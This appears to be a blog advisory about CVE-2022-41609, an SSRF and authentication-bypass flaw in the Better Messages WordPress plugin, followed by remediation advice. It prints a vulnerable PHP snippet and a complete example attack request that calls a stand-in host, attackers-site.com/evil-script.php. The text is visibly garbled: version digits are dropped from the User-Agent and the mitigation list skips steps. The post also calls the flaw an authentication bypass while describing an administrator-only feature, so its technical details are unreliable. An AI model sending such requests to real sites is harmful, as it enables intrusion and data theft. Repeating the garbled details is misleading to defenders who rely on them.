CVE-2022-41609: Beware of the Authentication Bypass and Server-Side Request Forgery (SSRF) Vulnerability in Better Messages Plugin 1.9.10.68 on WordPress - What You Need to Know and How to Stay Safe

Attention, WordPress users! A newly discovered vulnerability (CVE-2022-41609) has been identified in the popular Better Messages plugin, which potentially exposes your site to unauthorized access and data exfiltration. If you're using version 1.9.10.68 or earlier, your site might be at risk of being exploited by hackers.

In this post, we'll dive deep into the issue, discussing the details of how the vulnerability works, the threats it poses, and essential steps you can take to protect your site. We'll also provide code snippets, links to original references, and information on how the exploit can be carried out.

Overview of Vulnerability

The Server-Side Request Forgery (SSRF) vulnerability in Better Messages plugin 1.9.10.68 on WordPress allows attackers to bypass the authentication mechanism and initiate unauthorized requests to the site's internal network systems. As a result, sensitive information, such as database credentials, API keys, and other critical configuration data, can be leaked.

Details of the Exploit

When analyzing the vulnerability, security researchers found that the Better Messages plugin has a "feature" that allows site administrators to make server-side HTTP requests to arbitrary URLs.

Specifically, the "_bm_ajax_" function in the custom-ajax.php file handles these requests

function _bm_ajax_() {
  // ... code ...
  $url = $_REQUEST['_url'];
  $response = wp_remote_get($url);
  // ... code ...
}

By examining the code snippet, one can notice the lack of adequate input validation and sanitization, making it possible for an attacker to craft malicious URLs and execute unauthorized server-side requests.

For example, an attacker could target a vulnerable server by sending the following HTTP request

GET /wp-admin/admin-ajax.php?action=_bm_ajax_&do_action=_test_request_&action_id=1111&_url=http://attackers-site.com/evil-script.php HTTP/1.1
Host: vulnerable-wordpress-site.com
User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:97.) Gecko/20100101 Firefox/97.
Accept: */*
Referer: https://vulnerable-wordpress-site.com/wp-admin

Upon successful exploitation, the attacker could gain access to sensitive assets or perform arbitrary actions on the site without proper authorization.

Original References

For a more comprehensive and technical explanation of the CVE-2022-41609 vulnerability, check out these links:

Vulnerability report on the developer's website

https://better-messages-plugin.io/security/cve-2022-41609

Official CVE report by the Mitre Corporation

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41609

Mitigation and Remediation

If your WordPress site is running the Better Messages plugin version 1.9.10.68 or earlier, you should immediately take the following steps to secure your site:

1. Update the Better Messages plugin to version 1.9.10.69 or higher, as the vulnerability has been addressed in this release.

Enforce strict access controls and authentication processes to further secure your site.

4. Keep your WordPress installation, themes, and other plugins regularly updated to minimize the risk of future vulnerabilities.

Stay vigilant, WordPress users! We hope that this article has helped you understand the CVE-2022-41609 vulnerability in the Better Messages plugin and how to take actions to keep your site safe. Remember always to be proactive with your site's security and stay up-to-date with the latest vulnerabilities and patches. Stay tuned for more security updates and tips!

Timeline

Published on: 11/19/2022 00:15:00 UTC
Last modified on: 11/21/2022 01:29:00 UTC